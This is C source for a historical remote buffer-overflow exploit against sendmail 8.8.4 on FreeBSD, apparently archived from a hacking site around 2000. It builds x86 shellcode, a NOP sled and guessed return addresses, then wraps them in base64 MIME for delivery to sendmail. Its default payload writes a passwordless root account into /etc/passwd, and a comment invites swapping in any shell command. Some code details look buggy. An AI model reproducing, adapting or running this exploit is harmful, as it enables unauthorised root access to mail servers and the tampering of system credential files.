home *** CD-ROM | disk | FTP | other *** search
- /*
- sendmail 8.8.4, freebsd, mime 7to8, remote
- I checked this only at home, at custom installed 8.8.4.
- I have no freebsd with preinstaled 8.8.4 around.
- change cmd[] below to shell command you want, and throw output to sendmail
- */
-
- #include <stdlib.h>
- #include <fcntl.h>
-
- #define BUFSIZE 6100
- #define OFFS -5000
- #define ALIGN 0
- #define ADDRS 15
-
- int get_sp(void)
- {
- /* __asm__(" movl %esp,%eax"); */
- return 0xefbf95e4;
- }
-
- /* up to 220 bytes */
- char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";
-
- char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
- "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
- "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
- "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
- "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
- "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
- "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
- "\x68\x2e\x2d\x63\x2e";
-
- char nop[]="\x90";
-
- char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
-
- void run(unsigned char *buf)
- {
- unsigned int i, j, k;
-
- printf("MIME-Version: 1.0\n");
- printf("Content-Type: text/plain\n");
- printf("Content-Transfer-Encoding: base64\n");
-
- k=strlen(buf) / 3 * 3;
- for (i=0; i < k; i+=3)
- {
- j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
- if (i % 54 == 0)
- printf("\n");
- printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
- printf("%c", Base64Table[(j & 0x03f000) >> 12]);
- printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
- printf("%c", Base64Table[j & 0x00003f]);
- }
- switch (strlen(buf) - k)
- {
- case 1:
- printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
- Base64Table[(buf[k] & 0x3) << 4]);
- break;
- case 2:
- printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
- Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
- Base64Table[(buf[k+1] & 0xf) << 2]);
- break;
- default:
- }
- printf("\n");
- }
-
- char code[sizeof(asmcode) + sizeof(cmd)];
-
- main(int argc, char *argv[])
- {
- char *buf, *ptr, addr[8];
- int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
- int i, noplen=strlen(nop);
-
- if (argc >1) bufsize=atoi(argv[1]);
- if (argc >2) offs=atoi(argv[2]);
- if (argc >3) addrs=atoi(argv[3]);
-
- strcpy(code, asmcode);
- strncat(code, cmd);
- strncat(code, ".");
- code[41]=0x1a+strlen(cmd)+1;
-
- if (bufsize<strlen(code))
- {
- printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
- exit(1);
- }
- if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL)
- {
- printf("Can't malloc\n");
- exit(1);
- }
- *(int *)addr=get_sp()+offs;
- printf("address - %p\n", *(int *)addr);
- ptr=buf;
- for (i=0; i<bufsize; i++)
- *ptr++=nop[i % noplen];
- memcpy(ptr-strlen(code), code, strlen(code));
- for (i=0; i<addrs<<2; i++)
- *ptr++=addr[i % sizeof(int)];
- *ptr=0;
- printf("total buf len - %d\n", strlen(buf));
-
- run(buf);
- }
- /* www.hack.co.za [2000]*/